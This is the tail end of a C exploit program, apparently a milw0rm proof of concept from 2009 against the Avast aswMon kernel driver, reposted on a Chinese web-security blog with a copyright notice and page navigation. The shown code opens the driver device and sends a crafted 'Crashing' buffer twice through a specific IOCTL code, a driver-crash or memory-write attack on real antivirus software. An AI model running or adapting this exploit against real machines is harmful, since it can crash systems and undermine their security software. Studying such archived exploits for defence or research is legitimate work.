        while(hDevice == (HANDLE) 0xffffffff){
          hDevice = CreateFile("\\\\.\\aswMon",GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
          Sleep(1000);
        }
        printf("Found !\nHandle : %p\n",hDevice);
          
        DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
        DeviceIoControl(hDevice,0xb2c8000c, Crashing,sizeof(Crashing),0,0,&NombreByte,NULL);
        AfficherListeFichiers();
        printf("Written.\n");

        CloseHandle(hDevice);
        getch();
        return 0;
    }

    // milw0rm.com [2009-08-24]

    转载请尊重版权,出处:秋天博客,零点空间
    本文链接: http://www.cfresh.net/web-security/103

    收藏与分享

    网络安全 ,
    Page 1 of 161234510...Last »